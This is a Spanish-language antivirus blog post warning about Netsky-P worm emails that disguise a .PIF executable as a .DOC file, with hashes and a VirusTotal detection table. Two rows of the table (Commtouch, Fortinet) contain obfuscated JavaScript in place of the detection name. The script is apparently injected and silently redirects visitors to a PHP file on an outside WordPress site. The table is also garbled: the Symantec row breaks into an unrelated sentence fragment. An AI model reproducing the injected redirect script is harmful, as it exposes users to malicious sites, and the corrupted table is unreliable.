SIGUEN LLEGANDO MAILS ANEXANDO NETSKY-P, EN FICHERO .DOC SIN APARENTE EXTENSION EJECUTABLE, AL UTILIZAR .PIF, QUE NO APARECEN NI MOSTRANDO EXTENSIONES
Estando ya controlado por el ELINETSA y por casi todos los antivirus, hacemos mencion de este mail (con remitente falseado, como es habitual en los NETSKY), debido a que vemos que el fichero anexado aparenta ser un .DOC, sin visualizar mas extensiones, (realmente es un PIF), lo que puede confundir al usuario y no pensar que se trata de un ejecutable infector
El preanalisis de virustotal ofrece este informe:
MD5 3018e99857f31a59e0777396ae634a8f
SHA1 7031cfe76ee7b2c925f2c00372fb9ef7f983f60c
Tamaño del fichero 28.9 KB ( 29568 bytes )
SHA256: c8fffb2e737514c551b2d7bcaf8baa459564b059cab1a35a3cec4b3c270d4525
Nombre: message_sat.doc …
Detecciones: 48 / 51
Fecha de análisis: 2014-04-08 07:43:42 UTC ( hace 0 minutos )
1 20
Antivirus Resultado Actualización
AVG I-Worm/Netsky 20140407
Ad-Aware Win32.Generic.497472 20140408
Agnitum I-Worm.NetSky!4NWvXC1SwiU 20140407
AhnLab-V3 Win-Trojan/Fsg.29568 20140407
AntiVir Worm/Netsky.AP 20140408
Antiy-AVL Worm[Email]/Win32.NetSky 20140407
Avast Win32:Netsky-AF [Wrm] 20140407
Baidu-International Worm.Win32.NetSky.aMKE 20140408
BitDefender Win32.Generic.497472 20140408
Bkav W32.SkyNetP.Worm 20140407
CAT-QuickHeal W32.NetSky.P 20140408
CMC Generic.Win32.3018e99857!MD 20140408
ClamAV Worm.NetSky-14 20140408
Commtouch $NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to:W32/Netsky.P@mm”>W32/Netsky.P@mm 20140408
F-Secure Win32.Generic.497472 20140408
Fortinet $NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to:W32/Netsky.p@MM”>W32/Netsky.p@MM 20140408
McAfee-GW-Edition Heuristic.BehavesLike.Win32.Suspicious-PKR.G 20140408
MicroWorld-eScan Win32.Generic.497472 20140408
Microsoft Worm:Win32/Netsky.P@mm 20140408
NANO-Antivirus Trojan.Win32.NetSky.idzx 20140408
Norman Netsky.P 20140408
Panda W32/Netsky.AE.worm 20140407
Qihoo-360 Win32/Worm.d2e 20140408
Rising PE:Trojan.Win32.Generic.129CEE65!312274533 20140406
SUPERAntiSpyware Worm.Netsky-P 20140408
Sophos W32/Netsky-P 20140408
Symantec todas las direcciones disponibles en el ordenador, utilizando una de ellas como falso remitente, por lo que quien recibe las broncas no tiene ninguna culpa, mientras que el realmente infectado que está enviando los mails no se entera, si no tiene un antivirus residente, claro.
saludos
ms, 8-4-2014
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Los comentarios están cerrados.